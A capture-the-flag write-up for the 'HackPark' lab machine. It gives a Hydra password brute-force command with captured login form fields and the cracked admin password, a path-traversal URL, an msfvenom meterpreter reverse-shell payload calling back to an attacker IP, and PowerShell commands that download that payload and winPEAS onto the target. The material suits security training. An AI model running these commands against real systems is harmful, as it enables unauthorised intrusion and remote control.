HackPark

March 19, 2024

Task 1: Deploy the vulnerable Windows Machine

First we have to search the image using the "Search image with Google" function

Task 2: Using Hydra to brute-force a login

Just by using the hint button we can see the username is admin

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.111.114 http-post-form "/Account/login.aspx::F=Login failed"

__VIEWSTATE=zSPr%2FbE9p5VtuD%2FYUBqqKjGmguzeivEjbary%2BOu8DLOHncZLYh8BJP%2FL8e%2FFfWYY4I0Wu4CeMOsr1PcodPOpR%2FyATVKxJJqIiE09kZ8uhxZ8lSEqt%2FiB3%2Fw63fE0f1YWRb1I0eCaZY1Kba8%2Bedac7sMeRoVhvKaXovv8dGcQeiH%2FiHNFofHPQZZO%2By5zsES5OdAvj1h1TQB%2Bq1a4nL29pDbXmSVgIsc%2BN6I7FpGLFJIgXjx3b5DKTgOG2ZYZ2rJNGd0mmxQkU%2Bk9%2BHiHySiVoVuLbMfEHMW5oSv%2BEpc70bibPnfDWnQ0KNIS%2B%2FV1lL6UNIpsHG1kp7C2V082lscXV6pB2pDaRPofAG2%2BOtq05QoekdXY&__EVENTVALIDATION=nZSdi%2FQaKqr9kKJHJHFMzD43uQIsdUicpApRTJ9gFeWHPluv9GlOjgY%2BwUClocwR76os%2FiqaehKfpHfhIZhRcM0vW0UBhUNVBpop0NvIou9I8RY0Bn0nUPT2QCiP%2FY%2BaY%2B4pHZJhtf6gZHryIA%2FQj%2B4zmJ09nsnHy0oyNPTxazLxh4rt&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=asd&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in;

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.111.114 http-post-form "/Account/login.aspx:__VIEWSTATE=zSPr%2FbE9p5VtuD%2FYUBqqKjGmguzeivEjbary%2BOu8DLOHncZLYh8BJP%2FL8e%2FFfWYY4I0Wu4CeMOsr1PcodPOpR%2FyATVKxJJqIiE09kZ8uhxZ8lSEqt%2FiB3%2Fw63fE0f1YWRb1I0eCaZY1Kba8%2Bedac7sMeRoVhvKaXovv8dGcQeiH%2FiHNFofHPQZZO%2By5zsES5OdAvj1h1TQB%2Bq1a4nL29pDbXmSVgIsc%2BN6I7FpGLFJIgXjx3b5DKTgOG2ZYZ2rJNGd0mmxQkU%2Bk9%2BHiHySiVoVuLbMfEHMW5oSv%2BEpc70bibPnfDWnQ0KNIS%2B%2FV1lL6UNIpsHG1kp7C2V082lscXV6pB2pDaRPofAG2%2BOtq05QoekdXY&__EVENTVALIDATION=nZSdi%2FQaKqr9kKJHJHFMzD43uQIsdUicpApRTJ9gFeWHPluv9GlOjgY%2BwUClocwR76os%2FiqaehKfpHfhIZhRcM0vW0UBhUNVBpop0NvIou9I8RY0Bn0nUPT2QCiP%2FY%2BaY%2B4pHZJhtf6gZHryIA%2FQj%2B4zmJ09nsnHy0oyNPTxazLxh4rt&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=Login failed"

admin:1qaz2wsx

Task 3: Compromise the machine

/?theme=../../App_Data/files/

Task 4: Windows Privilege Escalation

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.9.193.229 LPORT=4444 -f exe -o reverse.exe

powershell -Command "Invoke-WebRequest -Uri 'http://10.9.193.229:8000/reverse.exe' -OutFile 'reverse.exe'"

powershell -Command "Invoke-WebRequest -Uri 'http://10.9.193.229:8000/winPEASx64.exe' -OutFile 'winPEASx64.exe'"

powershell -Command "Invoke-WebRequest -Uri 'http://10.9.193.229:8000/winPEAS.bat' -OutFile 'winPEAS.bat'"

PreviousOOB XXE NextAlfred

Last updated 1 year ago